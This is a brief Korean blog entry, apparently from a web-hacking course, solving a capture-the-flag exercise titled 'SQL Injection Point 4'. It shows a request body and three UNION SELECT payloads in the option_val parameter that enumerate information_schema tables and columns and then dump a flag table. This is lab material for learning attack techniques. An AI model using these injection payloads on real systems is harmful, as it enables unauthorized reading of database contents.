웹 해킹 코스/과제
SQL Injection Point 4
팥들었슈_
2023. 12. 20. 13:48
SQL Injection Point 4
50
flag를 찾으세요!
reqeust body
option_val=username union select table_name,table_schema,3,4,5,6,7,8,9,10 from information_schema.tables order by 1 #&board_result=aksrl25&board_search=%F0%9F%94%8D&date_from=&date_to=
injection
option_val=username union select table_name,table_schema,3,4,5,6,7,8,9,10 from information_schema.tables order by 1
option_val=username union select table_name,table_schema,column_name,4,5,6,7,8,9,10 from information_schema.columns order by 2 desc
option_val=username union select idx,flag,3,4,5,6,7,8,9,10 from flagHere #